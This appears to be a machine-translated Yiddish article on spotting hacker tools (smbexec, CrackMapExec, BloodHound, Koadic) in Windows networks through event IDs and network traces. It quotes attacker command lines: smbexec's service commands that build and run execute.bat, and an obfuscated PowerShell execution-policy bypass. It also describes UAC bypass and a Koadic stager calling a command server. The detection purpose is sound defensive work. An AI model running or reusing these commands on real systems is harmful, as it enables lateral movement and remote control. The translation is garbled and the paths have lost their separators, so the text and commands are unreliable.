ื‘ื™ื™ึทืฉืคึผื™ืœ ืคื•ืŸ ื•ื•ื™ ืึทื–ืึท ืึท ื’ืขืฆื™ื™ึทื’ ืึทืจื‘ืขื˜, ืื™ืŸ ื“ืขื ืคืึทืœ ืขืก ืื™ื– ื“ื™ ื”ื™ื’ืข ืึทื“ืžื™ื ื™ืกื˜ืจืึทื˜ืึธืจ ืงืึทื ืกืึธื•ืœ.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 3. ื™ื ื˜ืขืจืึทืงื˜ื™ื•ื•ืข ืกืžื‘ืขืงืกืขืง ืงืึทื ืกืึธื•ืœ

ื“ืขืจ ืขืจืฉื˜ืขืจ ืฉืจื™ื˜ ืคื•ืŸ smbexec ื ืึธืš ืึธื˜ืขื ื˜ืึทืงื™ื™ืฉืึทืŸ ืื™ื– ืฆื• ืขืคึฟืขื ืขืŸ ื“ื™ SCM ืžื™ื˜ ื“ื™ OpenSCManagerW ื‘ืึทืคึฟืขืœ (15). ื“ื™ ืึธื ืคึฟืจืขื’ ืื™ื– ื ืึธื•ื˜ืึทื‘ืึทืœ: ื“ื™ MachineName ืคืขืœื“ ืื™ื– DUMMY.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 4. ื‘ืขื˜ืŸ ืฆื• ืขืคืขื ืขืŸ ืกืขืจื•ื•ื™ืก ืงืึธื ื˜ืจืึธืœ ืžืึทื ืึทื’ืขืจ

ื“ืขืจื ืึธืš, ื“ื™ ื“ื™ื ืกื˜ ืื™ื– ื‘ืืฉืืคืŸ ืžื™ื˜ ื“ื™ CreateServiceW ื‘ืึทืคึฟืขืœ (12). ืื™ืŸ ื“ืขื ืคืึทืœ ืคื•ืŸ smbexec, ืžื™ืจ ืงืขื ืขืŸ ื–ืขืŸ ื“ื™ ื–ืขืœื‘ืข ื‘ืึทืคึฟืขืœ ืงืึทื ืกื˜ืจืึทืงืฉืึทืŸ ืœืึธื’ื™ืง ื™ืขื“ืขืจ ืžืึธืœ. ืื™ืŸ Fig. 5 ื’ืจื™ืŸ ื™ื ื“ื™ืงื™ื™ืฅ ืึทื ื˜ืฉื™ื™ื ื“ื–ืฉื“ ื‘ืึทืคึฟืขืœืŸ ืคึผืึทืจืึทืžืขื˜ืขืจืก, ื’ืขืœ ื™ื ื“ื™ืงื™ื™ืฅ ื•ื•ืึธืก ืึท ืึทื˜ืึทืงืขืจ ืงืขื ืขืŸ ื˜ื•ื™ืฉืŸ. ืขืก ืื™ื– ื’ืจื™ื ื’ ืฆื• ื–ืขืŸ ืึทื– ื“ื™ ื ืึธืžืขืŸ ืคื•ืŸ ื“ื™ ืขืงืกืขืงื•ื˜ืึทื‘ืœืข ื˜ืขืงืข, ื–ื™ื™ึทืŸ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ ืื•ืŸ ื“ื™ ืจืขื–ื•ืœื˜ืึทื˜ ื˜ืขืงืข ืงืขื ืขืŸ ื–ื™ื™ืŸ ื˜ืฉื™ื™ื ื“ื–ืฉื“, ืึธื‘ืขืจ ื“ื™ ืžื ื•ื—ื” ืื™ื– ืคื™ืœ ืžืขืจ ืฉื•ื•ืขืจ ืฆื• ื˜ื•ื™ืฉืŸ ืึธืŸ ื“ื™ืกื˜ื•ืจื‘ื™ื ื’ ื“ื™ ืœืึธื’ื™ืง ืคื•ืŸ ื“ื™ ื™ืžืคึผืึทืงืงืขื˜ ืžืึธื“ื•ืœืข.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 5. ื‘ืขื˜ืŸ ืฆื• ืฉืึทืคึฟืŸ ืึท ื“ื™ื ืกื˜ ื ื™ืฆืŸ ืกืขืจื•ื•ื™ืก ืงืึธื ื˜ืจืึธืœ ืžืึทื ืึทื’ืขืจ

Smbexec ืื•ื™ืš ืœืึธื–ืŸ ืงืœืึธืจ ื•ื•ื™ ื“ืขืจ ื˜ืึธื’ ื˜ืจืึทืกืขืก ืื™ืŸ ื“ื™ Windows ื’ืขืฉืขืขื ื™ืฉ ืงืœืึธืฅ. ืื™ืŸ ื“ื™ Windows Server 2016 ืงืœืึธืฅ ืคึฟืึทืจ ื“ื™ ื™ื ื˜ืขืจืึทืงื˜ื™ื•ื• ื‘ืึทืคึฟืขืœืŸ ืฉืึธืœ ืžื™ื˜ ื“ื™ ipconfig ื‘ืึทืคึฟืขืœ, ืžื™ืจ ื•ื•ืขืœืŸ ื–ืขืŸ ื“ื™ ืคืืœื’ืขื ื“ืข ืฉืœื™ืกืœ ืกื™ืงื•ื•ืึทื ืก ืคื•ืŸ ื’ืขืฉืขืขื ื™ืฉืŸ:

1. 4697 - ื™ื™ึทื ืžืึธื ื˜ื™ืจื•ื ื’ ืคื•ืŸ ื“ื™ ื“ื™ื ืกื˜ ืื•ื™ืฃ ื“ื™ ืงืึธืจื‘ืŸ ืก ืžืึทืฉื™ืŸ:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ืฉืึทืคื•ื ื’ ืคื•ืŸ ื“ื™ cmd.exe ืคึผืจืึธืฆืขืก ืžื™ื˜ ื“ื™ ืึทืจื’ื•ืžืขื ื˜ืŸ ืคื•ืŸ ืคื•ื ื˜ 1.
3. 5145 - ืงืึธื ื˜ืจืึธืœื™ืจื•ื ื’ ืึทืงืกืขืก ืจืขื›ื˜ ืฆื• ื“ื™ __ืึธื•ื˜ืคึผื•ื˜ ื˜ืขืงืข ืื™ืŸ ื“ื™ C$ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ.
4. 4697 - ื™ื™ึทื ืžืึธื ื˜ื™ืจื•ื ื’ ืคื•ืŸ ื“ื™ ื“ื™ื ืกื˜ ืื•ื™ืฃ ื“ื™ ืงืึธืจื‘ืŸ ืก ืžืึทืฉื™ืŸ.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ืฉืึทืคื•ื ื’ ืคื•ืŸ ื“ื™ cmd.exe ืคึผืจืึธืฆืขืก ืžื™ื˜ ื“ื™ ืึทืจื’ื•ืžืขื ื˜ืŸ ืคื•ืŸ ืคื•ื ื˜ 4.
6. 5145 - ืงืึธื ื˜ืจืึธืœื™ืจื•ื ื’ ืึทืงืกืขืก ืจืขื›ื˜ ืฆื• ื“ื™ __ืึธื•ื˜ืคึผื•ื˜ ื˜ืขืงืข ืื™ืŸ ื“ื™ C$ ื•ื•ืขื’ื•ื•ื™ื™ึทื–ืขืจ.

ื™ืžืคึผืึทืงืงืขื˜ ืื™ื– ื“ื™ ื™ืงืขืจ ืคึฟืึทืจ ื“ืขื•ื•ืขืœืึธืคึผื™ื ื’ ื‘ืึทืคืึทืœืŸ ืžื›ืฉื™ืจื™ื. ืขืก ืฉื˜ื™ืฆื˜ ื›ึผืžืขื˜ ืึทืœืข ืคึผืจืึธื˜ืึธืงืึธืœืก ืื™ืŸ ื“ื™ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ ืื•ืŸ ืื™ืŸ ื“ืขืจ ื–ืขืœื‘ื™ืงืขืจ ืฆื™ื™ื˜ ื”ืื˜ ื–ื™ื™ึทืŸ ืื™ื™ื’ืขื ืข ื›ืึทืจืึทืงื˜ืขืจื™ืกื˜ื™ืฉ ืคึฟืขื™ึดืงื™ื™ื˜ืŸ. ื“ืึธ ื–ืขื ืขืŸ ืกืคึผืขืฆื™ืคื™ืฉ ื•ื•ื™ื ืจืขื’ ืจื™ืงื•ื•ืขืก, ืื•ืŸ ื“ื™ ื ื•ืฆืŸ ืคื•ืŸ ื“ื™ SCM API ืžื™ื˜ ื›ืึทืจืึทืงื˜ืขืจื™ืกื˜ื™ืฉ ื‘ืึทืคึฟืขืœืŸ ืคืึธืจืžื™ืจื•ื ื’, ืื•ืŸ ื“ื™ ื˜ืขืงืข ื ืึธืžืขืŸ ืคึฟืึธืจืžืึทื˜ ืื•ืŸ SMB ื™ื™ึทื ื˜ื™ื™ืœืŸ SYSTEM32.

CRACKMAPEXEC

ื“ื™ CME ื’ืขืฆื™ื™ึทื’ ืื™ื– ื“ื™ื–ื™ื™ื ื“ ื‘ืคึฟืจื˜ ืฆื• ืึธื˜ืึทืžื™ื™ื˜ ื“ื™ ืจื•ื˜ื™ืŸ ืึทืงืฉืึทื ื– ืึทื– ืึท ืึทื˜ืึทืงืขืจ ื”ืื˜ ืฆื• ื“ื•ืจื›ืคื™ืจืŸ ืฆื• ืฉื˜ื™ื™ึทื’ืŸ ืื™ืŸ ื“ื™ ื ืขืฅ. ืขืก ืึทืœืึทื•ื– ืื™ืจ ืฆื• ืึทืจื‘ืขื˜ืŸ ืื™ืŸ ืงืึทื ื“ื–ืฉืึทื ื’ืงืฉืึทืŸ ืžื™ื˜ ื“ื™ ื‘ืึทื•ื•ื•ืกื˜ ืื™ืžืคืขืจื™ืข ืึทื’ืขื ื˜ ืื•ืŸ Meterpreter. ืฆื• ื•ื™ืกืคื™ืจืŸ ืงืึทืžืึทื ื“ื– ื’ืขื”ื™ื™ื, CME ืงืขื ืขืŸ ืึทื‘ืคืึทืกืงื™ื™ื˜ ื–ื™ื™. ื ื™ืฆืŸ ื‘ืœืึธืึธื“ื”ืึธื•ื ื“ (ืึท ื‘ืึทื–ื•ื ื“ืขืจ ืจื™ืงืึทื ืึทืกืึทื ืก ื’ืขืฆื™ื™ึทื’), ืึท ืึทื˜ืึทืงืขืจ ืงืขื ืขืŸ ืึธื˜ืึทืžื™ื™ื˜ ื“ื™ ื–ื•ื›ืŸ ืคึฟืึทืจ ืึทืŸ ืึทืงื˜ื™ื•ื• ืคืขืœื“ ืึทื“ืžื™ื ื™ืกื˜ืจืึทื˜ืึธืจ ืกืขืกื™ืข.

ื‘ืœืึธืึธื“ื”ืึธื•ื ื“

ื‘ืœืึธืึธื“ื”ืึธื•ื ื“, ื•ื•ื™ ืึท ืกื˜ืึทื ื“ืึทืœืึธื ืข ื’ืขืฆื™ื™ึทื’, ืึทืœืึทื•ื– ืึทื•ื•ืึทื ืกื™ืจื˜ืข ืจื™ืงืึทื ืึทืกืึทื ืก ืื™ืŸ ื“ื™ ื ืขืฅ. ืขืก ืงืึทืœืขืงืฅ ื“ืึทื˜ืŸ ื•ื•ืขื’ืŸ ื ื™ืฆืขืจืก, ืžืืฉื™ื ืขืŸ, ื’ืจื•ืคึผืขืก, ืกืขืฉืึทื ื– ืื•ืŸ ืื™ื– ืกืึทืคึผืœื™ื™ื“ ื•ื•ื™ ืึท PowerShell ืฉืจื™ืคื˜ ืึธื“ืขืจ ื‘ื™ื™ื ืขืจื™ ื˜ืขืงืข. LDAP ืึธื“ืขืจ SMB-ื‘ืื–ื™ืจื˜ ืคึผืจืึธื˜ืึธืงืึธืœืก ื–ืขื ืขืŸ ื’ืขื ื™ืฆื˜ ืฆื• ื–ืึทืžืœืขืŸ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข. ื“ื™ CME ื™ื ื˜ืึทื’ืจื™ื™ืฉืึทืŸ ืžืึธื“ื•ืœืข ืึทืœืึทื•ื– ื‘ืœืึธืึธื“ื”ืึธื•ื ื“ ืฆื• ื–ื™ื™ืŸ ื“ืึทื•ื ืœืึธื•ื“ื™ื“ ืฆื• ื“ื™ ืงืึธืจื‘ืŸ ืก ืžืึทืฉื™ืŸ, ืœื•ื™ืคืŸ ืื•ืŸ ื‘ืึทืงื•ืžืขืŸ ื“ื™ ื’ืขื–ืืžืœื˜ ื“ืึทื˜ืŸ ื ืึธืš ื“ื•ืจื›ืคื™ืจื•ื ื’, ืื•ืŸ ื“ืขืจืžื™ื˜ ืึธื˜ืึทืžื™ื™ื˜ื™ื ื’ ืึทืงืฉืึทื ื– ืื™ืŸ ื“ื™ ืกื™ืกื˜ืขื ืื•ืŸ ืžืึทื›ืŸ ื–ื™ื™ ื•ื•ื™ื™ื ื™ืงืขืจ ื‘ืืžืขืจืงื˜. ื“ื™ ื‘ืœืึธืึธื“ื”ืึธื•ื ื“ ื’ืจืึทืคื™ืง ืฉืึธืœ ื’ื™ื˜ ื“ื™ ื’ืขื–ืืžืœื˜ ื“ืึทื˜ืŸ ืื™ืŸ ื“ื™ ืคืึธืจืขื ืคื•ืŸ ื’ืจืึทืคืก, ื•ื•ืึธืก ืึทืœืึทื•ื– ืื™ืจ ืฆื• ื’ืขืคึฟื™ื ืขืŸ ื“ื™ ืฉืึธืจื˜ื™ืกื˜ ื•ื•ืขื’ ืคื•ืŸ ื“ื™ ืึทื˜ืึทืงืขืจ ืก ืžืึทืฉื™ืŸ ืฆื• ื“ื™ ืคืขืœื“ ืึทื“ืžื™ื ื™ืกื˜ืจืึทื˜ืึธืจ.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 6. ื‘ืœืึธืึธื“ื”ืึธื•ื ื“ ืฆื•ื‘ื™ื ื“

ืฆื• ืœื•ื™ืคืŸ ืื•ื™ืฃ ื“ื™ ืžืึทืฉื™ืŸ ืคื•ืŸ ื“ื™ ืงืึธืจื‘ืŸ, ื“ื™ ืžืึธื“ื•ืœืข ืงืจื™ื™ื™ืฅ ืึท ืึทืจื‘ืขื˜ ืžื™ื˜ ATSVC ืื•ืŸ SMB. ATSVC ืื™ื– ืึท ืฆื•ื‘ื™ื ื“ ืคึฟืึทืจ ืืจื‘ืขื˜ืŸ ืžื™ื˜ ื“ื™ Windows ื˜ืึทืกืง ืกื˜ืฉืขื“ื•ืœืขืจ. CME ื ื™ืฆื˜ ื–ื™ื™ึทืŸ NetrJobAdd (1) ืคึฟื•ื ืงืฆื™ืข ืฆื• ืฉืึทืคึฟืŸ ื˜ืึทืกืงืก ืื™ื‘ืขืจ ื“ื™ ื ืขืฅ. ื ื‘ื™ื™ืฉืคึผื™ืœ ืคื•ืŸ ื•ื•ืึธืก ื“ื™ CME ืžืึธื“ื•ืœืข ืกืขื ื“ื– ืื™ื– ื’ืขื•ื•ื™ื–ืŸ ืื™ืŸ Fig. 7: ื“ืึธืก ืื™ื– ืึท cmd.exe ื‘ืึทืคึฟืขืœืŸ ืจื•ืคืŸ ืื•ืŸ ืึทื‘ืคื•ืกืงื™ื™ื˜ื™ื“ ืงืึธื“ ืื™ืŸ ื“ื™ ืคืึธืจืขื ืคื•ืŸ ืึทืจื’ื•ืžืขื ื˜ืŸ ืื™ืŸ ืงืกืžืœ ืคึฟืึธืจืžืึทื˜.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืคื™ื’.7. ืฉืึทืคึฟืŸ ืึท ืึทืจื‘ืขื˜ ื“ื•ืจืš CME

ื ืึธืš ื“ื™ ืึทืจื‘ืขื˜ ืื™ื– ื“ืขืจืœืื ื’ื˜ ืคึฟืึทืจ ื“ื•ืจื›ืคื™ืจื•ื ื’, ื“ื™ ืžืึทืฉื™ืŸ ืคื•ืŸ ื“ื™ ืงืึธืจื‘ืŸ ืกื˜ืึทืจืฅ ื‘ืœืึธืึธื“ื”ืึธื•ื ื“ ื–ื™ืš, ืื•ืŸ ื“ืึธืก ืงืขื ืขืŸ ื–ื™ื™ืŸ ื’ืขื–ืขืŸ ืื™ืŸ ื“ื™ ืคืึทืจืงืขืจ. ื“ืขืจ ืžืึธื“ื•ืœืข ืื™ื– ืงืขืจืึทืงื˜ืขืจื™ื™ื–ื“ ื“ื•ืจืš LDAP ืงื•ื•ื™ืจื™ื– ืฆื• ืงืจื™ื’ืŸ ื ืึธืจืžืึทืœ ื’ืจื•ืคึผืขืก, ืึท ืจืฉื™ืžื” ืคื•ืŸ ืึทืœืข ืžืืฉื™ื ืขืŸ ืื•ืŸ ื™ื•ื–ืขืจื– ืื™ืŸ ื“ื™ ืคืขืœื“, ืื•ืŸ ื‘ืึทืงื•ืžืขืŸ ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื•ื•ืขื’ืŸ ืึทืงื˜ื™ื•ื• ื‘ืึทื ื™ืฆืขืจ ืกืขืฉืึทื ื– ื“ื•ืจืš ื“ื™ SRVSVC NetSessEnum ื‘ืขื˜ืŸ.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 8. ื‘ืึทืงื•ืžืขืŸ ืึท ืจืฉื™ืžื” ืคื•ืŸ ืึทืงื˜ื™ื•ื• ืกืขืฉืึทื ื– ื“ื•ืจืš ืกืžื‘

ืื™ืŸ ืึทื“ื™ืฉืึทืŸ, ื“ื™ ืงืึทื˜ืขืจ ืคื•ืŸ Bloodhound ืื•ื™ืฃ ืึท ืงืึธืจื‘ืŸ ืก ืžืึทืฉื™ืŸ ืžื™ื˜ ืึทื“ืึทื˜ื™ื ื’ ืขื ื™ื™ื‘ืึทืœื“ ืื™ื– ื‘ืื’ืœื™ื™ื˜ ื“ื•ืจืš ืึท ื’ืขืฉืขืขื ื™ืฉ ืžื™ื˜ ID 4688 (ืคึผืจืึธืกืขืก ืฉืึทืคื•ื ื’) ืื•ืŸ ื“ืขื ืคึผืจืึธืฆืขืก ื ืึธืžืขืŸ. ยซC:WindowsSystem32cmd.exeยป. ื•ื•ืึธืก ืื™ื– ื ืึธื•ื˜ืึทื‘ืึทืœ ื•ื•ืขื’ืŸ ืขืก ื–ืขื ืขืŸ ื“ื™ ื‘ืึทืคึฟืขืœืŸ ืฉื•ืจื” ืึทืจื’ื•ืžืขื ื˜ืŸ:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , โ€ฆ , 40,41 )-jOIN'' ) "

Enum_avproducts

ื“ื™ enum_avproducts ืžืึธื“ื•ืœืข ืื™ื– ื–ื™ื™ืขืจ ื˜ืฉื™ืงืึทื•ื•ืข ืคึฟื•ืŸ ื“ื™ ืคื•ื ื˜ ืคื•ืŸ ืžื™ื™ื ื•ื ื’ ืคื•ืŸ ืคืึทื ื’ืงืฉืึทื ืึทืœื™ื˜ื™ ืื•ืŸ ื™ืžืคึผืœืึทืžืขื ื˜ื™ื™ืฉืึทืŸ. WMI ืึทืœืึทื•ื– ืื™ืจ ืฆื• ื ื•ืฆืŸ ื“ื™ WQL ืึธื ืคึฟืจืขื’ ืฉืคึผืจืึทืš ืฆื• ืฆื•ืจื™ืงืงืจื™ื’ืŸ ื“ืึทื˜ืŸ ืคื•ืŸ ืคืึทืจืฉื™ื“ืŸ Windows ืึทื‘ื“ื–ืฉืขืงืฅ, ื•ื•ืึธืก ืื™ื– ื‘ื™ื™ืกื™ืงืœื™ ื•ื•ืึธืก ื“ื™ CME ืžืึธื“ื•ืœืข ื ื™ืฆื˜. ืขืก ื“ื–ืฉืขื ืขืจื™ื™ืฅ ืคึฟืจืื’ืŸ ืฆื• ื“ื™ AntiSpywareProduct ืื•ืŸ AntiMirusProduct ืงืœืืกืŸ ื•ื•ืขื’ืŸ ื“ื™ ืฉื•ืฅ ืžื›ืฉื™ืจื™ื ืื™ื ืกื˜ืึทืœื™ืจืŸ ืื•ื™ืฃ ื“ื™ ืงืึธืจื‘ืŸ ืก ืžืึทืฉื™ืŸ. ื›ึผื“ื™ ืฆื• ื‘ืึทืงื•ืžืขืŸ ื“ื™ ื ื•ื™ื˜ื™ืง ื“ืึทื˜ืŸ, ื“ื™ ืžืึธื“ื•ืœืข ืงืึทื ืขืงืฅ ืฆื• ื“ื™ ืจืึธื˜ืกืขืงื•ืจื™ื˜ื™ืฆืขื ื˜ืจืึทืœ 2 ื ืึธืžืขืŸ, ืื•ืŸ ื“ื–ืฉืขื ืขืจื™ื™ืฅ ืึท WQL ืึธื ืคึฟืจืขื’ ืื•ืŸ ื‘ืึทืงื•ืžืขืŸ ืึท ืขื ื˜ืคืขืจ. ืื™ืŸ Fig. ืคื™ื’ื•ืจืข 9 ื•ื•ื™ื™ื–ื˜ ื“ื™ ืื™ื ื”ืึทืœื˜ ืคื•ืŸ ืึทื–ืึท ืจื™ืงื•ื•ืขืก ืื•ืŸ ืจืขืกืคึผืึธื ืกืขืก. ืื™ืŸ ืื•ื ื“ื–ืขืจ ื‘ื™ื™ึทืฉืคึผื™ืœ, Windows Defender ืื™ื– ื’ืขืคึฟื•ื ืขืŸ.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 9. ื ืขืฅ ื˜ืขื˜ื™ืงื™ื™ื˜ ืคื•ืŸ ื“ื™ enum_avproducts ืžืึธื“ื•ืœืข

ืึธืคื˜, WMI ืึทื“ืึทื˜ื™ื ื’ (Trace WMI-Activity), ืื™ืŸ ื•ื•ืขืžืขื ืก ื’ืขืฉืขืขื ื™ืฉืŸ ืื™ืจ ืงืขื ืขืŸ ื’ืขืคึฟื™ื ืขืŸ ื ื•ืฆื™ืง ืื™ื ืคึฟืึธืจืžืึทืฆื™ืข ื•ื•ืขื’ืŸ WQL ืงื•ื•ื™ืจื™ื–, ืงืขืŸ ื–ื™ื™ืŸ ืคืึทืจืงืจื™ืคึผืœื˜. ืื‘ืขืจ ืื•ื™ื‘ ืขืก ืื™ื– ืขื ื™ื™ื‘ืึทืœื“, ืื•ื™ื‘ ื“ื™ enum_avproducts ืฉืจื™ืคื˜ ืื™ื– ืœื•ื™ืคืŸ, ืึท ื’ืขืฉืขืขื ื™ืฉ ืžื™ื˜ ID 11 ื•ื•ืขื˜ ื–ื™ื™ืŸ ื’ืขืจืื˜ืขื•ื•ืขื˜.

ื™ืขื“ืขืจ ืคื•ืŸ ื“ื™ CME ืžืึทื“ื–ืฉื•ืœื– ื”ืื˜ ื–ื™ื™ืŸ ืื™ื™ื’ืขื ืข ืึทืจื˜ืึทืคืึทืงืฅ, ืฆื™ ืขืก ืื™ื– ืกืคึผืขืฆื™ืคื™ืฉ WQL ืคึฟืจืื’ืŸ ืึธื“ืขืจ ื“ื™ ืฉืึทืคื•ื ื’ ืคื•ืŸ ืึท ื–ื™ื›ืขืจ ื˜ื™ืคึผ ืคื•ืŸ ืึทืจื‘ืขื˜ ืื™ืŸ ืึท ืึทืจื‘ืขื˜ ืกืงืขื“ื–ืฉื•ืœืขืจ ืžื™ื˜ ืึทื‘ืคื•ืกืงื™ื™ืฉืึทืŸ ืื•ืŸ ื‘ืœืึธืึธื“ื”ืึธื•ื ื“-ืกืคึผืขืฆื™ืคื™ืฉ ื˜ืขื˜ื™ืงื™ื™ื˜ ืื™ืŸ LDAP ืื•ืŸ SMB.

KOADIC

ื ืึธืคึผืฉื™ื™ื“ื ื“ื™ืง ืฉื˜ืจื™ืš ืคื•ืŸ Koadic ืื™ื– ื“ื™ ื ื•ืฆืŸ ืคื•ืŸ ื“ื–ืฉืึทื•ื•ืึทืกืงืจื™ืคึผื˜ ืื•ืŸ ื•ื•ื‘ืกืงืจื™ืคึผื˜ ื™ื ื˜ืขืจืคึผืจืึทื˜ืขืจื– ื’ืขื‘ื•ื™ื˜ ืื™ืŸ Windows. ืื™ืŸ ื“ืขื ื–ื™ื ืขืŸ, ืขืก ื’ื™ื™ื˜ ื“ื™ ืœืขื‘ืขื“ื™ืง ืึทื•ื•ืขืง ื“ื™ ืœืึทื ื“ ื’ืึทื ื’ - ื“ืึธืก ืื™ื–, ืขืก ื”ืื˜ ืงื™ื™ืŸ ืคื•ื ื“ืจื•ื™ืกื ื“ื™ืง ื“ื™ืคึผืขื ื“ืึทื ืกื™ื– ืื•ืŸ ื ื™ืฆื˜ ื ืึธืจืžืึทืœ Windows ืžื›ืฉื™ืจื™ื. ื“ืึธืก ืื™ื– ืึท ื’ืขืฆื™ื™ึทื’ ืคึฟืึทืจ ืคื•ืœ ืงืึทืžืึทื ื“ & ืงืึธื ื˜ืจืึธืœ (CnC), ื–ื™ื ื˜ ื ืึธืš ื™ื ืคืขืงืฆื™ืข ืึท "ื™ืžืคึผืœืึทื ื˜" ืื™ื– ืื™ื ืกื˜ืึทืœื™ืจืŸ ืื•ื™ืฃ ื“ื™ ืžืึทืฉื™ืŸ, ืึทืœืึทื•ื™ื ื’ ืขืก ืฆื• ื–ื™ื™ืŸ ืงืึทื ื˜ืจืึธื•ืœื“. ืึทื–ืึท ืžืึทืฉื™ืŸ, ืื™ืŸ ืงืึธืึทื“ื™ืฉ ื˜ืขืจืžื™ื ืึธืœืึธื’ื™ืข, ืื™ื– ื’ืขืจื•ืคืŸ ืึท "ื–ืึทืžื‘ื™". ืื•ื™ื‘ ืขืก ื–ืขื ืขืŸ ื ื™ื˜ ื’ืขื ื•ื’ื™ืง ืคึผืจื™ื•ื•ื™ืœืึทื“ื–ืฉืึทื– ืคึฟืึทืจ ืคื•ืœ ืึธืคึผืขืจืึทืฆื™ืข ืื•ื™ืฃ ื“ื™ ื–ื™ื™ึทื˜ ืคื•ืŸ ื“ื™ ืงืึธืจื‘ืŸ, Koadic ื”ืื˜ ื“ื™ ืคื™ื™ื™ืงื™ื™ื˜ ืฆื• ื›ืึทืคึผืŸ ื–ื™ื™ ืžื™ื˜ ื‘ืึทื ื™ืฆืขืจ ืึทืงืึทื•ื ื˜ ืงืึธื ื˜ืจืึธืœ ื‘ื™ื™ืคึผืึทืก (UAC ื‘ื™ื™ืคึผืึทืก) ื˜ืขืงื ื™ืงืก.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 10. ืงืึธืึทื“ื™ืง ืฉืขืœ

ื“ื™ ืงืึธืจื‘ืŸ ืžื•ื–ืŸ ืึธื ื”ื™ื™ื‘ืŸ ืงืึธืžื•ื ื™ืงืึทืฆื™ืข ืžื™ื˜ ื“ื™ ืงืึทืžืึทื ื“ & ืงืึธื ื˜ืจืึธืœ ืกืขืจื•ื•ืขืจ. ืฆื• ื˜ืึธืŸ ื“ืึธืก, ื–ื™ ื“ืึทืจืฃ ืงืึธื ื˜ืึทืงื˜ ืึท ืคืจื™ืขืจ ืฆื•ื’ืขื’ืจื™ื™ื˜ URI ืื•ืŸ ื‘ืึทืงื•ืžืขืŸ ื“ื™ ื”ื•ื™ืคึผื˜ ืงืึธืึทื“ื™ืง ื’ื•ืฃ ืžื™ื˜ ืื™ื™ื ืขืจ ืคื•ืŸ ื“ื™ ืกื˜ืึทื’ืขืจืก. ืื™ืŸ Fig. ืคื™ื’ื•ืจืข 11 ื•ื•ื™ื™ื–ื˜ ืึท ื‘ื™ื™ืฉืคึผื™ืœ ืคึฟืึทืจ ื“ื™ mshta stager.

ื•ื•ื™ ืฆื• ื“ืขื˜ืขืงื˜ ืื ืคืืœืŸ ืื•ื™ืฃ Windows ื™ื ืคืจืึทืกื˜ืจืึทืงื˜ืฉืขืจ: ืœืขืจื ืขืŸ ื”ืขืงืขืจ ืžื›ืฉื™ืจื™ื
ืจื™ื™ืก. 11. ื™ื ื™ื˜ื™ืึทืœื™ื™ื–ื™ื ื’ ืึท ืกืขืกื™ืข ืžื™ื˜ ื“ื™ ืงื ืง ืกืขืจื•ื•ืขืจ

